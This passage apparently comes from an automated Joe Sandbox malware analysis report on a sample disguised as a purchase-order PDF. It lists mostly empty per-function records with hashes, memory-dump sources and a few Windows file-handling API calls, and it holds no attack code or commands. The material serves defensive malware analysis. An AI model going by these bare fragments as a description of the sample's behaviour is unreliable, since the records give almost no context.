                                                                                                                                    • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                    • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,75923420,00441800,0043F000), ref: 0040586F
                                                                                                                                    • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75923420,00441800,0043F000), ref: 004058B7
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058DA
                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058E0
                                                                                                                                    • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058F0
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 2035342205-1173974218
                                                                                                                                    • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                    • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                                    • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                    • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                                                    • API String ID: 0-3604444728
                                                                                                                                    • Opcode ID: 2fab9e0f5df23a71c62cd5dd5ceee782a3e6fd9f9ab4720e4894ff6b3cccf4c7
                                                                                                                                    • Instruction ID: 1a73026b69f2dc8065400ec0c789ee993c5e25feb8ca6848301ed18e2c0fe8ab
                                                                                                                                    • Opcode Fuzzy Hash: 2fab9e0f5df23a71c62cd5dd5ceee782a3e6fd9f9ab4720e4894ff6b3cccf4c7
                                                                                                                                    • Instruction Fuzzy Hash: 6D328E74E01218CFDB68CF65C994B9DBBB2BF89300F1081A9D909AB361DB759E85CF14
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: .5uq
                                                                                                                                    • API String ID: 0-910421107
                                                                                                                                    • Opcode ID: a75edd94a6a40c25283debb6cbd78203e99e5f6e784b0e3940a3c69bdf528228
                                                                                                                                    • Instruction ID: 07d50421be3144fd437f7978767c12d5c68211518a4ea7324a32f5305ccb7bbf
                                                                                                                                    • Opcode Fuzzy Hash: a75edd94a6a40c25283debb6cbd78203e99e5f6e784b0e3940a3c69bdf528228
                                                                                                                                    • Instruction Fuzzy Hash: C452BC74A01228CFDB65DF69C984BDDBBB2BF89301F1085E9D809AB251DB359E85CF40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4716eec6f1b8d78a1ade3a004ac1c89facd37be0f84bbd56e390f9752abf8e13
                                                                                                                                    • Instruction ID: 8f4b9908cfe1a4b0ea537249e7d199a069b8928908c1ecf7a470a15f2d48e287
                                                                                                                                    • Opcode Fuzzy Hash: 4716eec6f1b8d78a1ade3a004ac1c89facd37be0f84bbd56e390f9752abf8e13
                                                                                                                                    • Instruction Fuzzy Hash: DCC1B174E01218CFDB15DFA5C994B9DBBB2FF89300F2080A9D809AB355DB349A86CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b03d8e32e74bbe07d6d20f0b1b11b3cba6728dd959ed4d147a7b1bb74446248d
                                                                                                                                    • Instruction ID: 49c3f6f452d012405b5325ddd8e91c2352ffeca9c079ee8bd2132a2b0ccf9b85
                                                                                                                                    • Opcode Fuzzy Hash: b03d8e32e74bbe07d6d20f0b1b11b3cba6728dd959ed4d147a7b1bb74446248d
                                                                                                                                    • Instruction Fuzzy Hash: B8C1B174E01218CFDB15DFA5C994B9DBBB2FF89300F2084A9D909AB355DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 43198b0759254773a6000d0b22c2f3aff188145ba577f89117473481f3fc20a2
                                                                                                                                    • Instruction ID: 1918fc2a7ff0c9e887e87baf15aec442f799f5cb834309d2a261df4f501cc7f1
                                                                                                                                    • Opcode Fuzzy Hash: 43198b0759254773a6000d0b22c2f3aff188145ba577f89117473481f3fc20a2
                                                                                                                                    • Instruction Fuzzy Hash: 9EC1B074E01218CFDB15DFA5C994B9DBBB2FF89300F2081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7654aebe61aab38429b9e75f1667a3d4238e13bfb57fe02917a8de2424f9e3b1
                                                                                                                                    • Instruction ID: 08f12193e8141766deff7547465634a545fbd7483be32dde6599c64ecfff2b6b
                                                                                                                                    • Opcode Fuzzy Hash: 7654aebe61aab38429b9e75f1667a3d4238e13bfb57fe02917a8de2424f9e3b1
                                                                                                                                    • Instruction Fuzzy Hash: 10C1A074E01218CFDB15DFA5C994B9DBBB2FF89300F2085A9D809AB365DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d373b6d308a75e12e7320d3d173dfbcada82892ed84dfe3de94bc9613256cf58
                                                                                                                                    • Instruction ID: 7b2f4d10989726da2975c4d6a9184489e2a72640596f6259113ec0c44ef43ccb
                                                                                                                                    • Opcode Fuzzy Hash: d373b6d308a75e12e7320d3d173dfbcada82892ed84dfe3de94bc9613256cf58
                                                                                                                                    • Instruction Fuzzy Hash: FDC1B174E01218CFDB15DFA5C994B9DBBB2FF89300F2080AAD908AB355DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d4b2498dd84e60de3c9841705fa609cc4ce2995b32f794c440a4e1479015b62f
                                                                                                                                    • Instruction ID: ef7cd23d2eb1efa63c01e0842c587dddc9dea35a73fdfacfea04b304ee127721
                                                                                                                                    • Opcode Fuzzy Hash: d4b2498dd84e60de3c9841705fa609cc4ce2995b32f794c440a4e1479015b62f
                                                                                                                                    • Instruction Fuzzy Hash: E0C1CF74E01218CFDB15DFA5C994B9DBBB2FF89300F6080A9D808AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9d526c995a4e22e3dc1d8a300c172231fef925b2800ec3d8ea916c17d24d0f7a
                                                                                                                                    • Instruction ID: 32aa6f86dc92b56227bb172b336b772254807f8a67e9d7cfc647909cb73a5e1f
                                                                                                                                    • Opcode Fuzzy Hash: 9d526c995a4e22e3dc1d8a300c172231fef925b2800ec3d8ea916c17d24d0f7a
                                                                                                                                    • Instruction Fuzzy Hash: 3EC1BF74E01218CFDB15DFA5C994B9DBBB2FF89300F6080A9D808AB365DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c5b9c66ee70c3f5752e2610e1a5b50ffc979bbf2cf29b0855b491bd3475e986a
                                                                                                                                    • Instruction ID: 3790d3f84f9a183f6fb05cc748747aeea2146f70fb81b6c7c504560a5da1537f
                                                                                                                                    • Opcode Fuzzy Hash: c5b9c66ee70c3f5752e2610e1a5b50ffc979bbf2cf29b0855b491bd3475e986a
                                                                                                                                    • Instruction Fuzzy Hash: B8C1BE74E01218CFDB15DFA5C994B9DBBB2FF89300F2081A9D809AB365DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bb0ec18c50315e0291f66cb71dd1940a205cc53b0b7e5662ceabe5f1fcf0a535
                                                                                                                                    • Instruction ID: efc30cf99b7abb0a6852090b9bdca423d97c2e04f02c4815bb1f2a45e3e066b0
                                                                                                                                    • Opcode Fuzzy Hash: bb0ec18c50315e0291f66cb71dd1940a205cc53b0b7e5662ceabe5f1fcf0a535
                                                                                                                                    • Instruction Fuzzy Hash: D6C1AF74E01218CFDB14DFA5C994B9DBBB2FF89300F6081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a4bd5870a2edff4388276a34f42f27bd96be2a6385d0470cf832f7df55719a31
                                                                                                                                    • Instruction ID: a7fc6eb864bcdcc4a817ec0eea507fdb29b251b9854ceb672cffb70f46870104
                                                                                                                                    • Opcode Fuzzy Hash: a4bd5870a2edff4388276a34f42f27bd96be2a6385d0470cf832f7df55719a31
                                                                                                                                    • Instruction Fuzzy Hash: BFC1AE74E01218CFDB14DFA5C994B9DBBB2FF89300F6081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 21b265084407a5008b8347918c9101fea8feb251810359ca83d21276d3e5369b
                                                                                                                                    • Instruction ID: 4b777e9f602f62aa7e8ff666a9e6f70b7ee20f41ffd84589427853b2e31dbb1a
                                                                                                                                    • Opcode Fuzzy Hash: 21b265084407a5008b8347918c9101fea8feb251810359ca83d21276d3e5369b
                                                                                                                                    • Instruction Fuzzy Hash: DEC1AD74E01218CFDB54DFA5C994B9DBBB2FF89300F2084A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 14f1ab6a8c5b4cf75e1cd2044676a580cd217c5d4486fc1d6c3a8dbbc5e5560d
                                                                                                                                    • Instruction ID: c640e25d0ee01af4db81a2b25f8b2ee8005b8d846c2922c1fe67372e022fe41a
                                                                                                                                    • Opcode Fuzzy Hash: 14f1ab6a8c5b4cf75e1cd2044676a580cd217c5d4486fc1d6c3a8dbbc5e5560d
                                                                                                                                    • Instruction Fuzzy Hash: 81C1BE74E01218CFDB55DFA5C994B9DBBB2FF89300F2080A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9856b4f95c047418233c02af39a0ee9eb98fc842f92a3bfc9cd057e9dac4260d
                                                                                                                                    • Instruction ID: 4bbe6ddb13df41843deb4ccee3785969d1757d2f2206bf84b31ef1abad3f3e67
                                                                                                                                    • Opcode Fuzzy Hash: 9856b4f95c047418233c02af39a0ee9eb98fc842f92a3bfc9cd057e9dac4260d
                                                                                                                                    • Instruction Fuzzy Hash: DDC1AE74E01218CFDB15DFA5C994B9DBBB2FF89300F2080A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c7dc4204f359069730b61de093c77d7e2130111587364cd794a504442d34ad34
                                                                                                                                    • Instruction ID: 385114818d1fd1def90e5c7c426fe13d30f744797aeacdc48af193c38c261b20
                                                                                                                                    • Opcode Fuzzy Hash: c7dc4204f359069730b61de093c77d7e2130111587364cd794a504442d34ad34
                                                                                                                                    • Instruction Fuzzy Hash: B3C1AD74E01218CFDB54DFA5C994B9DBBB2FF89300F2081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1211847355429c556812a085809f1a2ba12f65b6c7f4ed76a6d9386857724758
                                                                                                                                    • Instruction ID: 0ba86b7cc5a3ceaa94ee1fdd458bba4117003cfcb80bbeab49289b362f2e0123
                                                                                                                                    • Opcode Fuzzy Hash: 1211847355429c556812a085809f1a2ba12f65b6c7f4ed76a6d9386857724758
                                                                                                                                    • Instruction Fuzzy Hash: 56C1BD74E01218CFDB54DFA5C994B9DBBB2FF89300F2081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9a11b8f1baa0831b01f0b45ea7cb28c70e9d8d4f7db6a2e45246306df62b4b3c
                                                                                                                                    • Instruction ID: cd0f40dee9f20583f1b1df8aa5e13c830333821574a91b42839f0e21e6629e6c
                                                                                                                                    • Opcode Fuzzy Hash: 9a11b8f1baa0831b01f0b45ea7cb28c70e9d8d4f7db6a2e45246306df62b4b3c
                                                                                                                                    • Instruction Fuzzy Hash: 43C1BD74E01218CFDB54DFA5C994B9DBBB2FF89300F2081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4ffa214363256ff81aa85a71192feb9dc2a8282b2a8fd497827f260997b712e0
                                                                                                                                    • Instruction ID: ccb3ee98df52a5f40a43312f3b3d020b29fb8388d26ab69e8e0a470470029f86
                                                                                                                                    • Opcode Fuzzy Hash: 4ffa214363256ff81aa85a71192feb9dc2a8282b2a8fd497827f260997b712e0
                                                                                                                                    • Instruction Fuzzy Hash: B1C1AF74E01218CFDB14DFA5C994B9DBBB2FF89300F6081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0df511e1bfba748a731a3707c9f59ca92636db32aeb98626d7984930c76138f6
                                                                                                                                    • Instruction ID: bd01634c7a5a48bb1e6c0dc061cd5c8e3a547c22247381e69a627185880a1b97
                                                                                                                                    • Opcode Fuzzy Hash: 0df511e1bfba748a731a3707c9f59ca92636db32aeb98626d7984930c76138f6
                                                                                                                                    • Instruction Fuzzy Hash: 4BC1AD74E01218CFDB14DFA5C994B9DBBB2FF89300F2081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 10410767531529d79edd5d5a05485e956322b027c5582a448fffd51736b5f2b3
                                                                                                                                    • Instruction ID: 1dd1abc23e8a213a8c603cdc161ca31a760517427d146d39c26c99b3a449e3fb
                                                                                                                                    • Opcode Fuzzy Hash: 10410767531529d79edd5d5a05485e956322b027c5582a448fffd51736b5f2b3
                                                                                                                                    • Instruction Fuzzy Hash: 7BC1AD74E01218CFDB14DFA5C994B9DBBB2FF89300F6081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e5096dba334d7acc69f4848f96e1a4372d102c564b66f479bdd38f39047599ab
                                                                                                                                    • Instruction ID: a9cf11195ebebde89edb845e664e0644c68fd54873b04166b92233344a486944
                                                                                                                                    • Opcode Fuzzy Hash: e5096dba334d7acc69f4848f96e1a4372d102c564b66f479bdd38f39047599ab
                                                                                                                                    • Instruction Fuzzy Hash: 77C1AD74E01218CFDB15DFA5C994B9DBBB2FF89300F6080A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 69aa089c0445ea2be3451e98e287f670b8ac5d296b12c413fc5276cc16dae0a7
                                                                                                                                    • Instruction ID: 73007f0158697041b744686b1b6eeac32f40f36b1c1fffb5a2768fb6e854800d
                                                                                                                                    • Opcode Fuzzy Hash: 69aa089c0445ea2be3451e98e287f670b8ac5d296b12c413fc5276cc16dae0a7
                                                                                                                                    • Instruction Fuzzy Hash: 6AC1AE74E01218CFDB54DFA5C994B9DBBB2FF89300F2081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 83bb7d6d9b977bc5444435a6cff18404a6c263f0ffb531a9d3835d61e8bbbfdc
                                                                                                                                    • Instruction ID: 2efc962f3f22a5febea27049e84085678cede8dbeae9ccd5a83780794e851ad9
                                                                                                                                    • Opcode Fuzzy Hash: 83bb7d6d9b977bc5444435a6cff18404a6c263f0ffb531a9d3835d61e8bbbfdc
                                                                                                                                    • Instruction Fuzzy Hash: 3CC1BE74E01218CFDB14DFA5C994B9DBBB2FF89300F2080A9D809AB365DB359A85CF10
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a44fa213b1fd4b524f659f6e420d01ff857fc6d0953e39d718ac48fe1b596b07
                                                                                                                                    • Instruction ID: 004f10a4757e1181c4652906bbdf777e34e621864b50d1da75f1e4ee6bd47a05
                                                                                                                                    • Opcode Fuzzy Hash: a44fa213b1fd4b524f659f6e420d01ff857fc6d0953e39d718ac48fe1b596b07
                                                                                                                                    • Instruction Fuzzy Hash: FAC1AD74E01218CFDB54DFA5C994B9DBBB2FF89300F2081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d7658bfcba8bb333ddca13c86edb20cd47a7843a5488b92a7428642b4078eea0
                                                                                                                                    • Instruction ID: 2ab9494e18e5af50939dcaa7f788676d36ec40d28270526444c8fd517fb5c0bb
                                                                                                                                    • Opcode Fuzzy Hash: d7658bfcba8bb333ddca13c86edb20cd47a7843a5488b92a7428642b4078eea0
                                                                                                                                    • Instruction Fuzzy Hash: D2C1AD74E01218CFDB15DFA5C994B9DBBB2FF89300F2080A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5e0e4bab0d18571796d0b0c48c92154c959fa485b1b6d0b3b49b9e8e98c88206
                                                                                                                                    • Instruction ID: 8baeba1cdfe72a6df65092dbb3d81d8f6f9789f65d38789c9188b1c959e7eac7
                                                                                                                                    • Opcode Fuzzy Hash: 5e0e4bab0d18571796d0b0c48c92154c959fa485b1b6d0b3b49b9e8e98c88206
                                                                                                                                    • Instruction Fuzzy Hash: E3C1AE74E01218CFDB14DFA5C994B9DBBB2FF89300F2081A9D809AB365DB359A85CF50
